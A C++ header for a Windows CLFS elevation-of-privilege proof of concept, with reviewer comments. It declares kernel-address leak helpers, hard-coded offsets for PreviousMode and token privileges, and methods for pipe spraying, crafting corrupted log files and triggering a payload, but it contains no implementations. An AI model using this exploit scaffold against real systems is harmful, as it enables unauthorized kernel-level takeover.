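// Declarations for a CLFS (clfsw32) elevation-of-privilege proof of concept:
// NT information-class constants, big-pool query structures, hard-coded
// kernel structure offsets, and the clfs_eop class that drives the run.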
#pragma warning (disable : 4005)
#pragma warning(disable:28159)

#pragma once
#include <stdio.h>
#include <iostream>
#include <windows.h>
#include <clfsw32.h>
#include <ntstatus.h>
#include <processthreadsapi.h>
#include <tlhelp32.h>
#include "ntos.h"
#include "crc32.h"

#pragma comment(lib, "ntdll.lib")
#pragma comment(lib, "Clfsw32.lib")

// Free-function declaration. The clfs_eop class later in this header declares
// a member with the same name and signature, and no definition is visible
// here, so it cannot be told from this file which one is implemented.
// NOTE(review): looks like a leftover; confirm against the .cpp and keep one.
VOID FindKernelModulesBase();

//
// SYSTEM_INFORMATION_CLASS selectors for NtQuerySystemInformation.
// These are information-class numbers, not syscall numbers.
//   0x0b  loaded-module list (includes module load addresses)
//   0x10  system handle table (includes kernel object addresses)
// Both classes disclose kernel addresses to the caller, which is why they
// matter for KASLR. NOTE(review): newer Windows releases are reported to
// withhold these addresses from callers without SeDebugPrivilege; verify
// against the build under test.
//
#define SystemModuleInformation  0xb
#define SystemHandleInformation 0x10


// One record of the big-pool listing (see SYSTEM_BIGPOOL_INFORMATION).
// The layout mirrors a structure filled in by the OS, so field order and
// sizes must not be changed.
typedef struct _SYSTEM_BIGPOOL_ENTRY {
	union {
		PVOID VirtualAddress;      // address of the allocation (a kernel pointer, going by the name)
		ULONG_PTR NonPaged : 1;    // 1-bit field sharing storage with VirtualAddress
	};
	SIZE_T SizeInBytes;            // size of the allocation in bytes
	union {
		UCHAR Tag[4];              // pool tag as four raw bytes
		ULONG TagUlong;            // the same four bytes viewed as one 32-bit value
	};
} SYSTEM_BIGPOOL_ENTRY, * PSYSTEM_BIGPOOL_ENTRY;


// Header of the big-pool listing: a count followed by that many entries.
// AllocatedInfo is declared with one element but is used as a variable-length
// trailing array, so sizeof(SYSTEM_BIGPOOL_INFORMATION) covers a single entry
// only. Any reader must bound its loop by both Count and the size of the
// buffer actually returned.
typedef struct _SYSTEM_BIGPOOL_INFORMATION {
	ULONG Count;                            // number of entries that follow
	SYSTEM_BIGPOOL_ENTRY AllocatedInfo[1];  // first of Count entries
} SYSTEM_BIGPOOL_INFORMATION, * PSYSTEM_BIGPOOL_INFORMATION;


// Function-pointer types for two native (ntdll) calls. How the pointers are
// obtained is not shown in this header; presumably they are resolved at run time.
// NOTE(review): identifiers that start with an underscore followed by an
// uppercase letter are reserved for the implementation. The names are kept
// here because other files may reference them.

// (information class, output buffer, buffer length, returned length)
typedef NTSTATUS(WINAPI* _NtQuerySystemInformation)(SYSTEM_INFORMATION_CLASS, PVOID, ULONG, PULONG);

// (process handle, destination address, source buffer, byte count, bytes written)
typedef NTSTATUS(NTAPI* _NtWriteVirtualMemory)(HANDLE, PVOID, PVOID, SIZE_T, PSIZE_T);



//
// Version dependent offsets
//
// Hard-coded byte offsets into kernel structures. The header does not say
// which Windows build they were taken from, and nothing here checks the
// running build. The names suggest a thread's PreviousMode field, a process's
// Win32Process pointer, a token's privileges block, and a DirectComposition
// per-process object; confirm against symbols for the intended build.
// For analysts: these names indicate which kernel fields the PoC is
// interested in, which helps when triaging a crash dump or memory image
// from an affected host.
//
#define OFFSET_OF_PREVIOUS_MODE 0x232
#define OFFSET_OF_WIN32PROCESS 0x3b0
#define OFFSET_OF_SEP_TOKEN_PRIVILEGES 0x40
#define OFFSET_OF_DCOMPOSITIONPROCESS 0x100


//
// CInteractionTrackerMarshaler object offsets
//
// OBJECT_SIZE is the assumed size of that object and OFFSET_OF_FUNCTION the
// offset of a function-pointer slot inside it (read off the names; both are
// build-specific constants with no validation in this header).
//
#define OFFSET_OF_FUNCTION 0x50
#define OBJECT_SIZE 0x1a0
// Two function types with identical ten-parameter signatures. The parameter
// list has the shape of the native device/file-system control calls (file
// handle, event, APC routine and context, I/O status block, control code,
// input buffer + length, output buffer + length). Which routine each stands
// for is not stated here.
// NOTE(review): func3 duplicates func; confirm whether both are needed.
typedef NTSTATUS func(HANDLE, HANDLE, PIO_APC_ROUTINE, PVOID, PIO_STATUS_BLOCK, ULONG, PVOID, ULONG, PVOID, ULONG);
typedef NTSTATUS func3(HANDLE, HANDLE, PIO_APC_ROUTINE, PVOID, PIO_STATUS_BLOCK, ULONG, PVOID, ULONG, PVOID, ULONG);


// Driver class for the proof of concept. It declares methods only: no data
// members, no virtual functions, and everything is public. All definitions
// live outside this header, so the per-method notes below are read off names
// and signatures and are assumptions to confirm against the implementation.
class clfs_eop
{
public:

	// Empty inline constructor and destructor. The ';' after each body is a
	// redundant empty declaration.
	clfs_eop() {};
	~clfs_eop() {};

	// Commented-out duplicate of the crcCalculatorAndFix declaration below.
	//int crcCalculatorAndFix(char*, int);

	// Takes an int and a caller-supplied UINT64 buffer. No length accompanies
	// temp_buffer, so the required size is an undocumented contract.
	void fun_pipeSpray(int value, UINT64* temp_buffer);

	// No parameters and no return value; any result must be stored in state
	// that is not visible in this header.
	void getVirtualAddress();

	// Returns a SIZE_T for the given handle; presumably the kernel address of
	// the object behind it. The failure value is not documented.
	SIZE_T GetObjectKernelAddress(HANDLE Object);

	// One-time setup step, judging by the name.
	VOID InitEnvironment();

	// Returns int; the meaning of the return value is not documented.
	int createInitialLogFile();

	// Returns a UINT64, presumably derived from the big-pool listing described
	// by SYSTEM_BIGPOOL_INFORMATION.
	UINT64 getBigPoolInfo();

	// Both write through a caller-opened FILE*. Whether they check or close the
	// stream is not visible here.
	VOID craftbaseFile(FILE* pfile);

	VOID craftSprayFile(FILE* pfile);

	// Takes a wide-character path and returns int; presumably recomputes a
	// CRC stored in the named file ("crc32.h" is included by this header).
	int FixCRCFile(WCHAR* _stored_temp_open);

	// Buffer plus length. mysize is a signed int, so the type itself does not
	// exclude a negative length. NOTE(review): confirm callers only pass the
	// true buffer size.
	int crcCalculatorAndFix(char* mybuf, int mysize);

	// Returns int; the meaning of the return value is not documented.
	int doFirstAlloc();

	// Same name and signature as the free function declared near the top of
	// this header.
	VOID FindKernelModulesBase();

	// Command-line handling. Uses TCHAR, so the character width follows the
	// project's UNICODE setting.
	void manage_args(int argc, TCHAR* argv[]);

	// No parameters and no return value; what the payload does is defined in
	// the implementation file, not here.
	VOID RunPayload();

	// Preparation step, judging by the name.
	void fun_prepare();

	// Each returns a WCHAR* for an index. Ownership of the returned buffer
	// (static, heap, who frees it) is not documented.
	WCHAR* logFileNames(int _i);

	WCHAR* containerNames(int _i);

	WCHAR* fileNames(int _i);

	// Takes two wide-character file names and returns int; the return
	// convention is not documented.
	int fun_trigger(WCHAR* _logfilename, WCHAR* _fopenfilename);

	// No parameters and no return value; presumably the wrapper around
	// fun_trigger.
	void to_trigger();

};